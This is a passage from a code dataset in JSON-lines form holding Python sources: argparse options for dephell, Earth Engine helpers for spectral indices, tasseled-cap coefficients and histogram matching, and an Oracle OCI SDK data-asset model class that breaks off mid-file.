help='path to venv directory for project.')\n venv_group.add_argument('--python', help='python version for venv.')\n\n\ndef build_other(parser):\n other_group = parser.add_argument_group('Other')\n\n other_group.add_argument('--cache-path', help='path to dephell 
cache')\n other_group.add_argument('--cache-ttl', type=int, help='Time to live for releases list cache')\n\n other_group.add_argument('--project', help='path to the current project')\n other_group.add_argument('--bin', help='path to the dir for installing scripts')\n\n other_group.add_argument('--envs', nargs='*', help='environments (main, dev) or extras to install')\n other_group.add_argument('--tests', nargs='*', help='paths to test files')\n other_group.add_argument('--versioning', choices=sorted(VERSION_SCHEMES), help='versioning scheme for project')\n"} {"ext": "py", "sha": "1a313ed7e184e08a66366fe00edbf9c4be0d4f6a", "content": "import json\nimport os\nimport re\nimport urllib.request\nimport warnings\nfrom typing import Optional, Union, Tuple, Dict\n\nimport ee\nimport pkg_resources\n\nfrom ee_extra.STAC.utils import _get_platform_STAC\nfrom ee_extra.utils import _load_JSON\n\n\ndef _get_expression_map(img: ee.Image, platformDict: dict) -> dict:\n \"\"\"Gets the dictionary required for the map parameter i n ee.Image.expression() method.\n\n Args:\n img : Image to get the dictionary from.\n platformDict : Dictionary retrieved from the _get_STAC_platform() method.\n\n Returns:\n Map dictionary for the ee.Image.expression() method.\n \"\"\"\n\n def lookupS2(img):\n return {\n \"A\": img.select(\"B1\"),\n \"B\": img.select(\"B2\"),\n \"G\": img.select(\"B3\"),\n \"R\": img.select(\"B4\"),\n \"RE1\": img.select(\"B5\"),\n \"RE2\": img.select(\"B6\"),\n \"RE3\": img.select(\"B7\"),\n \"N\": img.select(\"B8\"),\n \"N2\": img.select(\"B8A\"),\n \"WV\": img.select(\"B9\"),\n \"S1\": img.select(\"B11\"),\n \"S2\": img.select(\"B12\"),\n \"lambdaG\": 559.8,\n \"lambdaR\": 664.6,\n \"lambdaN\": 832.8,\n }\n\n def lookupL8(img):\n return {\n \"A\": img.select(\"B1\"),\n \"B\": img.select(\"B2\"),\n \"G\": img.select(\"B3\"),\n \"R\": img.select(\"B4\"),\n \"N\": img.select(\"B5\"),\n \"S1\": img.select(\"B6\"),\n \"S2\": img.select(\"B7\"),\n \"T1\": img.select(\"B10\"),\n \"T2\": img.select(\"B11\"),\n \"lambdaG\": 560.0,\n \"lambdaR\": 655.0,\n \"lambdaN\": 865.0,\n }\n\n def lookupL8C2(img):\n return {\n \"A\": img.select(\"SR_B1\"),\n \"B\": img.select(\"SR_B2\"),\n \"G\": img.select(\"SR_B3\"),\n \"R\": img.select(\"SR_B4\"),\n \"N\": img.select(\"SR_B5\"),\n \"S1\": img.select(\"SR_B6\"),\n \"S2\": img.select(\"SR_B7\"),\n \"T1\": img.select(\"ST_B10\"),\n \"lambdaG\": 560.0,\n \"lambdaR\": 655.0,\n \"lambdaN\": 865.0,\n }\n\n def lookupL45(img):\n return {\n \"B\": img.select(\"B1\"),\n \"G\": img.select(\"B2\"),\n \"R\": img.select(\"B3\"),\n \"N\": img.select(\"B4\"),\n \"S1\": img.select(\"B5\"),\n \"T1\": img.select(\"B6\"),\n \"S2\": img.select(\"B7\"),\n \"lambdaG\": 560.0,\n \"lambdaR\": 660.0,\n \"lambdaN\": 830.0,\n }\n\n def lookupL45C2(img):\n return {\n \"B\": img.select(\"SR_B1\"),\n \"G\": img.select(\"SR_B2\"),\n \"R\": img.select(\"SR_B3\"),\n \"N\": img.select(\"SR_B4\"),\n \"S1\": img.select(\"SR_B5\"),\n \"T1\": img.select(\"ST_B6\"),\n \"S2\": img.select(\"SR_B7\"),\n \"lambdaG\": 560.0,\n \"lambdaR\": 660.0,\n \"lambdaN\": 830.0,\n }\n\n def lookupL7(img):\n return {\n \"B\": img.select(\"B1\"),\n \"G\": img.select(\"B2\"),\n \"R\": img.select(\"B3\"),\n \"N\": img.select(\"B4\"),\n \"S1\": img.select(\"B5\"),\n \"T1\": img.select(\"B6\"),\n \"S2\": img.select(\"B7\"),\n \"lambdaG\": 560.0,\n \"lambdaR\": 660.0,\n \"lambdaN\": 835.0,\n }\n\n def lookupL7C2(img):\n return {\n \"B\": img.select(\"SR_B1\"),\n \"G\": img.select(\"SR_B2\"),\n \"R\": img.select(\"SR_B3\"),\n 
\"N\": img.select(\"SR_B4\"),\n \"S1\": img.select(\"SR_B5\"),\n \"T1\": img.select(\"ST_B6\"),\n \"S2\": img.select(\"SR_B7\"),\n \"lambdaG\": 560.0,\n \"lambdaR\": 660.0,\n \"lambdaN\": 835.0,\n }\n\n def lookupMOD09GQ(img):\n return {\n \"R\": img.select(\"sur_refl_b01\"),\n \"N\": img.select(\"sur_refl_b02\"),\n \"lambdaR\": 645.0,\n \"lambdaN\": 858.5,\n }\n\n def lookupMOD09GA(img):\n return {\n \"B\": img.select(\"sur_refl_b03\"),\n \"G\": img.select(\"sur_refl_b04\"),\n \"R\": img.select(\"sur_refl_b01\"),\n \"N\": img.select(\"sur_refl_b02\"),\n \"S1\": img.select(\"sur_refl_b06\"),\n \"S2\": img.select(\"sur_refl_b07\"),\n \"lambdaG\": 555.0,\n \"lambdaR\": 645.0,\n \"lambdaN\": 858.5,\n }\n\n def lookupMCD43A4(img):\n return {\n \"B\": img.select(\"Nadir_Reflectance_Band3\"),\n \"G\": img.select(\"Nadir_Reflectance_Band4\"),\n \"R\": img.select(\"Nadir_Reflectance_Band1\"),\n \"N\": img.select(\"Nadir_Reflectance_Band2\"),\n \"S1\": img.select(\"Nadir_Reflectance_Band6\"),\n \"S2\": img.select(\"Nadir_Reflectance_Band7\"),\n \"lambdaG\": 555.0,\n \"lambdaR\": 645.0,\n \"lambdaN\": 858.5,\n }\n\n lookupPlatform = {\n \"COPERNICUS/S2\": lookupS2,\n \"COPERNICUS/S2_SR\": lookupS2,\n \"LANDSAT/LC08/C01/T1_SR\": lookupL8,\n \"LANDSAT/LC08/C01/T2_SR\": lookupL8,\n \"LANDSAT/LC08/C02/T1_L2\": lookupL8C2,\n \"LANDSAT/LC08/C02/T2_L2\": lookupL8C2,\n \"LANDSAT/LC09/C02/T1_L2\": lookupL8C2,\n \"LANDSAT/LC09/C02/T2_L2\": lookupL8C2,\n \"LANDSAT/LE07/C01/T1_SR\": lookupL7,\n \"LANDSAT/LE07/C01/T2_SR\": lookupL7,\n \"LANDSAT/LE07/C02/T1_L2\": lookupL7C2,\n \"LANDSAT/LE07/C02/T2_L2\": lookupL7C2,\n \"LANDSAT/LT05/C01/T1_SR\": lookupL45,\n \"LANDSAT/LT05/C01/T2_SR\": lookupL45,\n \"LANDSAT/LT05/C02/T1_L2\": lookupL45C2,\n \"LANDSAT/LT05/C02/T2_L2\": lookupL45C2,\n \"LANDSAT/LT04/C01/T1_SR\": lookupL45,\n \"LANDSAT/LT04/C01/T2_SR\": lookupL45,\n \"LANDSAT/LT04/C02/T1_L2\": lookupL45C2,\n \"LANDSAT/LT04/C02/T2_L2\": lookupL45C2,\n \"MODIS/006/MOD09GQ\": lookupMOD09GQ,\n \"MODIS/006/MYD09GQ\": lookupMOD09GQ,\n \"MODIS/006/MOD09GA\": lookupMOD09GA,\n \"MODIS/006/MYD09GA\": lookupMOD09GA,\n \"MODIS/006/MOD09Q1\": lookupMOD09GQ,\n \"MODIS/006/MYD09Q1\": lookupMOD09GQ,\n \"MODIS/006/MOD09A1\": lookupMOD09GA,\n \"MODIS/006/MYD09A1\": lookupMOD09GA,\n \"MODIS/006/MCD43A4\": lookupMCD43A4,\n }\n\n if platformDict[\"platform\"] not in list(lookupPlatform.keys()):\n raise Exception(\n \"Sorry, satellite platform not supported for index computation!\"\n )\n\n return lookupPlatform[platformDict[\"platform\"]](img)\n\n\ndef _get_indices(online: bool) -> dict:\n \"\"\"Retrieves the dictionary of indices used for the index() method in ee.Image and ee.ImageCollection classes.\n\n Args:\n online : Wheter to retrieve the most recent list of indices directly from the GitHub repository and not from the local copy.\n\n Returns:\n Indices.\n \"\"\"\n if online:\n with urllib.request.urlopen(\n \"https://raw.githubusercontent.com/davemlz/awesome-ee-spectral-indices/main/output/spectral-indices-dict.json\"\n ) as url:\n indices = json.loads(url.read().decode())\n else:\n indices = _load_JSON(\"spectral-indices-dict.json\")\n\n return indices[\"SpectralIndices\"]\n\n\ndef _get_kernel_image(\n img: ee.Image, lookup: dict, kernel: str, sigma: Union[str, float], a: str, b: str\n) -> ee.Image:\n \"\"\"Creates an ee.Image representing a kernel computed on bands [a] and [b].\n\n Args:\n img : Image to compute the kernel on.\n lookup : Dictionary retrieved from _get_expression_map().\n kernel : Kernel to use.\n sigma : 
Length-scale parameter. Used for kernel = 'RBF'.\n a : Key of the first band to use.\n b : Key of the second band to use.\n\n Returns:\n Kernel image.\n \"\"\"\n if a not in list(lookup.keys()) or b not in list(lookup.keys()):\n return None\n else:\n lookupab = {\"a\": lookup[a], \"b\": lookup[b]}\n if isinstance(sigma, str):\n lookup = {**lookup, **lookupab, \"sigma\": img.expression(sigma, lookupab)}\n else:\n lookup = {**lookup, **lookupab, \"sigma\": sigma}\n kernels = {\n \"linear\": \"a * b\",\n \"RBF\": \"exp((-1.0 * (a - b) ** 2.0)/(2.0 * sigma ** 2.0))\",\n \"poly\": \"((a * b) + c) ** p\",\n }\n return img.expression(kernels[kernel], lookup)\n\n\ndef _remove_none_dict(dictionary: dict) -> dict:\n \"\"\"Removes elements from a dictionary with None values.\n\n Args:\n dictionary : Dictionary to remove None values.\n\n Returns:\n Curated dictionary.\n \"\"\"\n newDictionary = dict(dictionary)\n for key in dictionary.keys():\n if dictionary[key] is None:\n del newDictionary[key]\n return newDictionary\n\n\ndef _get_kernel_parameters(\n img: ee.Image, lookup: dict, kernel: str, sigma: Union[str, float]\n) -> dict:\n \"\"\"Gets the additional kernel parameters to compute kernel indices.\n\n Args:\n img : Image to compute the kernel parameters on.\n lookup : Dictionary retrieved from _get_expression_map().\n kernel : Kernel to use.\n sigma : Length-scale parameter. Used for kernel = 'RBF'.\n\n Returns:\n Kernel parameters.\n \"\"\"\n kernelParameters = {\n \"kNN\": _get_kernel_image(img, lookup, kernel, sigma, \"N\", \"N\"),\n \"kNR\": _get_kernel_image(img, lookup, kernel, sigma, \"N\", \"R\"),\n \"kNB\": _get_kernel_image(img, lookup, kernel, sigma, \"N\", \"B\"),\n \"kNL\": _get_kernel_image(img, lookup, kernel, sigma, \"N\", \"L\"),\n \"kGG\": _get_kernel_image(img, lookup, kernel, sigma, \"G\", \"G\"),\n \"kGR\": _get_kernel_image(img, lookup, kernel, sigma, \"G\", \"R\"),\n \"kGB\": _get_kernel_image(img, lookup, kernel, sigma, \"G\", \"B\"),\n \"kBB\": _get_kernel_image(img, lookup, kernel, sigma, \"B\", \"B\"),\n \"kBR\": _get_kernel_image(img, lookup, kernel, sigma, \"B\", \"R\"),\n \"kBL\": _get_kernel_image(img, lookup, kernel, sigma, \"B\", \"L\"),\n \"kRR\": _get_kernel_image(img, lookup, kernel, sigma, \"R\", \"R\"),\n \"kRB\": _get_kernel_image(img, lookup, kernel, sigma, \"R\", \"B\"),\n \"kRL\": _get_kernel_image(img, lookup, kernel, sigma, \"R\", \"L\"),\n \"kLL\": _get_kernel_image(img, lookup, kernel, sigma, \"L\", \"L\"),\n }\n\n return kernelParameters\n\n\ndef _get_tc_coefficients(platform: str) -> dict:\n \"\"\"Gets the platform-specific coefficient dictionary required for tasseled cap\n transformation.\n\n Platform matching is strict, meaning that data must be at the processing level\n specified by the reference literature that coefficients were sourced from, e.g.\n Landsat 8 SR cannot be transformed with Landsat 8 TOA coefficients.\n\n Args:\n platform : Platform name retrieved from the STAC.\n\n Returns:\n Map dictionary with band names and corresponding coefficients for brightness\n greenness, and wetness.\n\n Raises:\n Exception : If the platform has no supported coefficients.\n \"\"\"\n\n SENTINEL2_1C = {\n \"bands\": (\n \"B1\",\n \"B2\",\n \"B3\",\n \"B4\",\n \"B5\",\n \"B6\",\n \"B7\",\n \"B8\",\n \"B8A\",\n \"B9\",\n \"B10\",\n \"B11\",\n \"B12\",\n ),\n \"TCB\": (\n 0.2381,\n 0.2569,\n 0.2934,\n 0.3020,\n 0.3099,\n 0.3740,\n 0.4180,\n 0.3580,\n 0.3834,\n 0.0103,\n 0.0020,\n 0.0896,\n 0.0780,\n ),\n \"TCG\": (\n -0.2266,\n -0.2818,\n -0.3020,\n 
-0.4283,\n -0.2959,\n 0.1602,\n 0.3127,\n 0.3138,\n 0.4261,\n 0.1454,\n -0.0017,\n -0.1341,\n -0.2538,\n ),\n \"TCW\": (\n 0.1825,\n 0.1763,\n 0.1615,\n 0.0486,\n 0.0170,\n 0.0223,\n 0.0219,\n -0.0755,\n -0.0910,\n -0.1369,\n 0.0003,\n -0.7701,\n -0.5293,\n ),\n }\n\n # Zhai et al. 2022 also provide coefficients with the blue band, but\n # recommend omitting it due to difficulties in atmospheric correction.\n LANDSAT8_SR = {\n \"bands\": (\"SR_B3\", \"SR_B4\", \"SR_B5\", \"SR_B6\", \"SR_B7\"),\n \"TCB\": (0.4596, 0.5046, 0.5458, 0.4114, 0.2589),\n \"TCG\": (-0.3374, -0.4901, 0.7909, 0.0177, -0.1416),\n \"TCW\": (0.2254, 0.3681, 0.2250, -0.6053, -0.6298)\n }\n\n # Zhai et al. 2022 coefficients were included for L8 TOA over the Baig \n # et al. 2014 coefficients for consistency with the L8 SR coefficients, \n # which were not calculated by Baig et al.\n LANDSAT8_TOA = {\n \"bands\": (\"B3\", \"B4\", \"B5\", \"B6\", \"B7\"),\n \"TCB\": (0.4321, 0.4971, 0.5695, 0.4192, 0.2569),\n \"TCG\": (-0.3318, -0.4844, 0.7856, -0.0331, -0.1923),\n \"TCW\": (0.2633, 0.3945, 0.1801, -0.6121, -0.6066)\n }\n\n # Coefficients for Landsat 8 OLI are usable for Landsat 9 OLI-2, per\n # Zhai et al. 2022\n LANDSAT9_SR = LANDSAT8_SR\n LANDSAT9_TOA = LANDSAT8_TOA\n\n LANDSAT7_TOA = {\n \"bands\": (\"B1\", \"B2\", \"B3\", \"B4\", \"B5\", \"B7\"),\n \"TCB\": (0.3561, 0.3972, 0.3904, 0.6966, 0.2286, 0.1596),\n \"TCG\": (-0.3344, -0.3544, -0.4556, 0.6966, -0.0242, -0.2630),\n \"TCW\": (0.2626, 0.2141, 0.0926, 0.0656, -0.7629, -0.5388),\n }\n\n LANDSAT4_DN = {\n \"bands\": (\"B1\", \"B2\", \"B3\", \"B4\", \"B5\", \"B7\"),\n \"TCB\": (0.3037, 0.2793, 0.4743, 0.5585, 0.5082, 0.1863),\n \"TCG\": (-0.2848, -0.2435, -0.5435, 0.7243, 0.0840, -0.1800),\n \"TCW\": (0.1509, 0.1973, 0.3279, 0.3406, -0.7112, -0.4572),\n }\n\n LANDSAT4_SR = {\n \"bands\": (\"SR_B1\", \"SR_B2\", \"SR_B3\", \"SR_B4\", \"SR_B5\", \"SR_B7\"),\n \"TCB\": (0.2043, 0.4158, 0.5524, 0.5741, 0.3124, 0.2303),\n \"TCG\": (-0.1603, -0.2819, -0.4934, 0.7940, -0.0002, -0.1446),\n \"TCW\": (0.0315, 0.2021, 0.3102, 0.1594, -0.6806, -0.6109),\n }\n\n LANDSAT5_DN = {\n \"bands\": (\"B1\", \"B2\", \"B3\", \"B4\", \"B5\", \"B7\"),\n \"TCB\": (0.2909, 0.2493, 0.4806, 0.5568, 0.4438, 0.1706),\n \"TCG\": (-0.2728, -0.2174, -0.5508, 0.7221, 0.0733, -0.1648),\n \"TCW\": (0.1446, 0.1761, 0.3322, 0.3396, -0.6210, -0.4186),\n }\n\n MODIS_NBAR = {\n \"bands\": (\n \"Nadir_Reflectance_Band1\",\n \"Nadir_Reflectance_Band2\",\n \"Nadir_Reflectance_Band3\",\n \"Nadir_Reflectance_Band4\",\n \"Nadir_Reflectance_Band5\",\n \"Nadir_Reflectance_Band6\",\n \"Nadir_Reflectance_Band7\",\n ),\n \"TCB\": (0.4395, 0.5945, 0.2460, 0.3918, 0.3506, 0.2136, 0.2678),\n \"TCG\": (-0.4064, 0.5129, -0.2744, -0.2893, 0.4882, -0.0036, -0.4169),\n \"TCW\": (0.1147, 0.2489, 0.2408, 0.3132, -0.3122, -0.6416, -0.5087),\n }\n\n platformCoeffs = {\n \"COPERNICUS/S2\": SENTINEL2_1C,\n \"MODIS/006/MCD43A4\": MODIS_NBAR,\n \"LANDSAT/LC09/C02/T1_L2\": LANDSAT9_SR,\n \"LANDSAT/LC09/C02/T1_TOA\": LANDSAT9_TOA,\n \"LANDSAT/LC08/C02/T1_L2\": LANDSAT8_SR,\n \"LANDSAT/LC08/C02/T2_L2\": LANDSAT8_SR,\n \"LANDSAT/LC08/C01/T1_TOA\": LANDSAT8_TOA,\n \"LANDSAT/LC08/C01/T1_RT_TOA\": LANDSAT8_TOA,\n \"LANDSAT/LC08/C01/T2_TOA\": LANDSAT8_TOA,\n \"LANDSAT/LE07/C01/T1_TOA\": LANDSAT7_TOA,\n \"LANDSAT/LE07/C01/T1_RT_TOA\": LANDSAT7_TOA,\n \"LANDSAT/LE07/C01/T2_TOA\": LANDSAT7_TOA,\n \"LANDSAT/LT05/C01/T1\": LANDSAT5_DN,\n \"LANDSAT/LT05/C01/T2\": LANDSAT5_DN,\n \"LANDSAT/LT04/C02/T1_L2\": LANDSAT4_SR,\n \"LANDSAT/LT04/C02/T2_L2\": 
LANDSAT4_SR,\n \"LANDSAT/LT04/C01/T1\": LANDSAT4_DN,\n \"LANDSAT/LT04/C01/T2\": LANDSAT4_DN,\n }\n\n\n if platform not in list(platformCoeffs.keys()):\n raise Exception(\n \"Sorry, satellite platform not supported for tasseled cap transformation! Use one of \"\n + str(list(platformCoeffs.keys()))\n )\n\n return platformCoeffs[platform]\n\n\ndef _match_histogram(\n source: ee.Image,\n target: ee.Image,\n bands: Optional[Dict[str, str]],\n geometry: Optional[ee.Geometry],\n maxBuckets: int,\n) -> ee.Image:\n \"\"\"Adjust the histogram of an image to match a target image.\n\n Args:\n source : Image to adjust.\n target : Image to use as the histogram reference.\n bands : An optional dictionary of band names to match, with source bands as keys\n and target bands as values. If none is provided, bands will be matched by name.\n Any bands not included here will be dropped.\n geometry : The optional region to match histograms in that overlaps both images.\n If none is provided, the geometry of the source image will be used. If the\n source image is unbounded and no geometry is provided, histogram matching will\n fail.\n maxBuckets : The maximum number of buckets to use when building histograms. More\n buckets will require more memory and time but will generate more accurate\n results. The number of buckets will be rounded to the nearest power of 2.\n\n Returns:\n The adjusted image containing the matched source bands.\n \"\"\"\n\n def histogram_lookup(\n source_hist: ee.Array, target_hist: ee.Array\n ) -> Tuple[ee.List, ee.List]:\n \"\"\"Build a list of target values with corresponding counts to source values from a source and target histogram.\n\n Args:\n source_hist : A histogram for a source image returned by ee.Reducer.autoHistogram\n target_hist : A histogram for a target image returned by ee.Reducer.autoHistogram\n\n Returns:\n Source histogram values and target histogram values with corresponding counts.\n \"\"\"\n source_vals = source_hist.slice(1, 0, 1).project([0])\n source_counts = source_hist.slice(1, 1, 2).project([0])\n source_counts = source_counts.divide(source_counts.get([-1]))\n\n target_vals = target_hist.slice(1, 0, 1).project([0])\n target_counts = target_hist.slice(1, 1, 2).project([0])\n target_counts = target_counts.divide(target_counts.get([-1]))\n\n def lookup_value(n):\n \"\"\"Find the first target value with at least n counts.\"\"\"\n index = target_counts.gte(n).argmax()\n return target_vals.get(index)\n\n target_lookup_vals = source_counts.toList().map(lookup_value)\n\n return (source_vals.toList(), target_lookup_vals)\n\n geometry = ee.Element.geometry(source) if geometry is None else geometry\n\n source_bands = source.bandNames() if bands is None else list(bands.keys())\n target_bands = source.bandNames() if bands is None else list(bands.values())\n bands = ee.Dictionary.fromLists(source_bands, target_bands)\n\n source = source.select(source_bands)\n target = target.select(target_bands)\n\n source_histogram = source.reduceRegion(\n reducer=ee.Reducer.autoHistogram(maxBuckets=maxBuckets, cumulative=True),\n geometry=geometry,\n scale=30,\n maxPixels=1e13,\n bestEffort=True,\n )\n\n target_histogram = target.updateMask(source.mask()).reduceRegion(\n reducer=ee.Reducer.autoHistogram(maxBuckets=maxBuckets, cumulative=True),\n geometry=geometry,\n scale=30,\n maxPixels=1e13,\n bestEffort=True,\n )\n\n def match_bands(source_band: ee.String, target_band: ee.String) -> ee.Image:\n \"\"\"Match the histogram of one source band to a target band.\n\n Args:\n source_band : The 
name of a band in the source image to adjust.\n target_band : The name of a corresponding band in the target image to match to.\n\n Returns:\n The source band image histogram-matched to the target band.\n \"\"\"\n x, y = histogram_lookup(\n source_histogram.getArray(source_band),\n target_histogram.getArray(target_band),\n )\n matched = source.select([source_band]).interpolate(x, y)\n return matched\n\n matched = (\n ee.ImageCollection(bands.map(match_bands).values())\n .toBands()\n .rename(bands.keys())\n )\n\n # Preserve the metadata, band types, and band order of the source image.\n matched = ee.Image(matched.copyProperties(source, source.propertyNames()))\n matched = matched.cast(source.bandTypes(), source.bandNames())\n matched = matched.set(\"ee_extra:HISTOGRAM_TARGET\", target)\n\n # If the source image was bounded, clip the matched output to its bounds. If the source\n # image doesn't have a `geometry` this will fail, but that seems exceptionally rare.\n matched = ee.Algorithms.If(\n source.geometry().isUnbounded(),\n matched,\n matched.clip(source.geometry().bounds()),\n )\n\n return ee.Image(matched)\n"} {"ext": "py", "sha": "1a31402e86d05dd5dfa3c2d92780e0a2d814ef76", "content": "# coding: utf-8\n# Copyright (c) 2016, 2021, Oracle and/or its affiliates. All rights reserved.\n# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.\n\nfrom .update_data_asset_details import UpdateDataAssetDetails\nfrom oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401\nfrom oci.decorators import init_model_state_from_kwargs\n\n\n@init_model_state_from_kwargs\nclass UpdateDataAssetFromAtp(UpdateDataAssetDetails):\n \"\"\"\n Details for the Autonomous Transaction Processing data asset type.\n \"\"\"\n\n def __init__(self, **kwargs):\n \"\"\"\n Initializes a new UpdateDataAssetFromAtp object with values from keyword arguments. 
The default value of the :py:attr:`~oci.data_integration.models.UpdateDataAssetFromAtp.model_type` attribute\n of this class is ``ORACLE_ATP_DATA_ASSET`` and it should not be changed.\n The following keyword arguments are supported (corresponding to the getters/setters of this class):\n\n :param model_type:\n The value to assign to the model_type property of this UpdateDataAssetFromAtp.\n Allowed values for this property are: \"ORACLE_DATA_ASSET\", \"ORACLE_OBJECT_STORAGE_DATA_ASSET\", \"ORACLE_ATP_DATA_ASSET\", \"ORACLE_ADWC_DATA_ASSET\", \"MYSQL_DATA_ASSET\", \"GENERIC_JDBC_DATA_ASSET\", \"FUSION_APP_DATA_ASSET\", \"AMAZON_S3_DATA_ASSET\"\n :type model_type: str\n\n :param key:\n The value to assign to the key property of this UpdateDataAssetFromAtp.\n :type key: str\n\n :param model_version:\n The value to assign to the model_version property of this UpdateDataAssetFromAtp.\n :type model_version: str\n\n :param name:\n The value to assign to the name property of this UpdateDataAssetFromAtp.\n :type name: str\n\n :param description:\n The value to assign to the description property of this UpdateDataAssetFromAtp.\n :type description: str\n\n :param object_status:\n The value to assign to the object_status property of this UpdateDataAssetFromAtp.\n :type object_status: int\n\n :param object_version:\n The value to assign to the object_version property of this UpdateDataAssetFromAtp.\n :type object_version: int\n\n :param identifier:\n The value to assign to the identifier property of this UpdateDataAssetFromAtp.\n :type identifier: str\n\n :param external_key:\n The value to assign to the external_key property of this UpdateDataAssetFromAtp.\n :type external_key: str\n\n :param asset_properties:\n The value to assign to the asset_properties property of this UpdateDataAssetFromAtp.\n :type asset_properties: dict(str, str)\n\n :param registry_metadata:\n The value to assign to the registry_metadata property of this UpdateDataAssetFromAtp.\n :type registry_metadata: oci.data_integration.models.RegistryMetadata\n\n :param service_name:\n The value to assign to the service_name property of this UpdateDataAssetFromAtp.\n :type service_name: str\n\n :param driver_class:\n The value to assign to the driver_class property of this UpdateDataAssetFromAtp.\n :type driver_class: str\n\n :param credential_file_content:\n The value to assign to the credential_file_content property of this UpdateDataAssetFromAtp.\n :type credential_file_content: str\n\n :param wallet_secret:\n The value to assign to the wallet_secret property of this UpdateDataAssetFromAtp.\n :type wallet_secret: oci.data_integration.models.SensitiveAttribute\n\n :param wallet_password_secret:\n The value to assign to the wallet_password_secret property of this UpdateDataAssetFromAtp.\n :type wallet_password_secret: oci.data_integration.models.SensitiveAttribute\n\n :param region_id:\n The value to assign to the region_id property of this UpdateDataAssetFromAtp.\n :type region_id: str\n\n :param tenancy_id:\n The value to assign to the tenancy_id property of this UpdateDataAssetFromAtp.\n :type tenancy_id: str\n\n :param compartment_id:\n The value to assign to the compartment_id property of this UpdateDataAssetFromAtp.\n :type compartment_id: str\n\n :param autonomous_db_id:\n The value to assign to the autonomous_db_id property of this UpdateDataAssetFromAtp.\n :type autonomous_db_id: str\n\n :param default_connection:\n The value to assign to the default_connection property of this UpdateDataAssetFromAtp.\n :type default_connection: 
oci.data_integration.models.UpdateConnectionFromAtp\n\n \"\"\"\n self.swagger_types = {\n 'model_type': 'str',\n 'key': 'str',\n 'model_version': 'str',\n 'name': 'str',\n 'description': 'str',\n 'object_status': 'int',\n 'object_version': 'int',\n 'identifier': 'str',\n 'external_key': 'str',\n 'asset_properties': 'dict(str, str)',\n 'registry_metadata': 'RegistryMetadata',\n 'service_name': 'str',\n 'driver_class': 'str',\n 'credential_file_content': 'str',\n 'wallet_secret': 'SensitiveAttribute',\n 'wallet_password_secret': 'SensitiveAttribute',\n 'region_id': 'str',\n 'tenancy_id': 'str',\n 'compartment_id': 'str',\n 'autonomous_db_id': 'str',\n 'default_connection': 'UpdateConnectionFromAtp'\n }\n\n self.attribute_map = {\n 'model_type': 'modelType',\n 'key': 'key',\n 'model_version': 'modelVersion',\n 'name': 'name',\n 'description': 'description',\n 'object_status': 'objectStatus',\n 'object_version': 'objectVersion',\n 'identifier': 'identifier',\n 'external_key': 'externalKey',\n 'asset_properties': 'assetProperties',\n 'registry_metadata': 'registryMetadata',\n 'service_name': 'serviceName',\n 'driver_class': 'driverClass',\n 'credential_file_content': 'credentialFileContent',\n 'wallet_secret': 'walletSecret',\n 'wallet_password_secret': 'walletPasswordSecret',\n 'region_id': 'regionId',\n 'tenancy_id': 'tenancyId',\n 'compartment_id': 'compartmentId',\n 'autonomous_db_id': 'autonomousDbId',\n 'default_connection': 'defaultConnection'\n }\n\n self._model_type = None\n self._key = None\n self._model_version = None\n self._name = None\n self._description = None\n self._object_status = None\n self._object_version = None\n self._identifier = None\n self._external_key = None\n self._asset_properties = None\n self._registry_metadata = None\n self._service_name = None\n self._driver_class = None\n self._credential_file_content = None\n self._wallet_secret = None\n self._wallet_password_secret = None\n self._region_id = None\n self._tenancy_id = None\n self._compartment_id = None\n self._autonomous_db_id = None\n self._default_connection = None\n self._model_type = 'ORACLE_ATP_DATA_ASSET'\n\n @property\n def service_name(self):\n \"\"\"\n Gets the service_name of this UpdateDataAssetFromAtp.\n The Autonomous Transaction Processing instance service name.\n\n\n :return: The service_name of this UpdateDataAssetFromAtp.\n :rtype: str\n \"\"\"\n return self._service_name\n\n @service_name.setter\n def service_name(self, service_name):\n \"\"\"\n Sets the service_name of this UpdateDataAssetFromAtp.\n The Autonomous Transaction Processing instance service name.\n\n\n :param service_name: The service_name of this UpdateDataAssetFromAtp.\n :type: str\n \"\"\"\n self._service_name = service_name\n\n @property\n def driver_class(self):\n \"\"\"\n Gets the driver_class of this UpdateDataAssetFromAtp.\n The Autonomous Transaction Processing driver class\n\n\n :return: The driver_class of this UpdateDataAssetFromAtp.\n :rtype: str\n \"\"\"\n return self._driver_class\n\n @driver_class.setter\n def driver_class(self, driver_class):\n \"\"\"\n Sets the driver_class of this UpdateDataAssetFromAtp.\n The Autonomous Transaction Processing driver class\n\n\n :param driver_class: The driver_class of this UpdateDataAssetFromAtp.\n :type: str\n \"\"\"\n self._driver_class = driver_class\n\n @property\n def credential_file_content(self):\n \"\"\"\n Gets the credential_file_content of this UpdateDataAssetFromAtp.\n The credential file content from an Autonomous Transaction Processing wallet.\n\n\n :return: The 
credential_file_content of this UpdateDataAssetFromAtp.\n :rtype: str\n \"\"\"\n return self._credential_file_content\n\n @credential_file_content.setter\n def credential_file_content(self, credential_file_content):\n \"\"\"\n Sets the credential_file_content of this UpdateDataAssetFromAtp.\n The credential file content from an Autonomous Transaction Processing wallet.\n\n\n :param credential_file_content: The credential_file_content of this UpdateDataAssetFromAtp.\n :type: str\n \"\"\"\n self._credential_file_content = credential_file_content\n\n @property\n def wallet_secret(self):\n \"\"\"\n Gets the wallet_secret of this UpdateDataAssetFromAtp.\n\n :return: The wallet_secret of this UpdateDataAssetFromAtp.\n :rtype: oci.data_integration.models.SensitiveAttribute\n \"\"\"\n return self._wallet_secret\n\n @wallet_secret.setter\n def wallet_secret(self, wallet_secret):\n \"\"\"\n Sets the wallet_secret of this UpdateDataAssetFromAtp.\n\n :param wallet_secret: The wallet_secret of this UpdateDataAssetFromAtp.\n :type: oci.data_integration.models.SensitiveAttribute\n \"\"\"\n self._wallet_secret = wallet_secret\n\n @property\n def wallet_password_secret(self):\n \"\"\"\n Gets the wallet_password_secret of this UpdateDataAssetFromAtp.\n\n :return: The wallet_password_secret of this UpdateDataAssetFromAtp.\n :rtype: oci.data_integration.models.SensitiveAttribute\n \"\"\"\n return self._wallet_password_secret\n\n @wallet_password_secret.setter\n def wallet_password_secret(self, wallet_password_secret):\n \"\"\"\n Sets the wallet_password_secret of this UpdateDataAssetFromAtp.\n\n :param wallet_password_secret: The wallet_password_secret of this UpdateDataAssetFromAtp.\n :type: oci.data_integration.models.SensitiveAttribute\n \"\"\"\n self._wallet_password_secret = wallet_password_secret\n\n @property\n def region_id(self):\n \"\"\"\n Gets the region_id of this 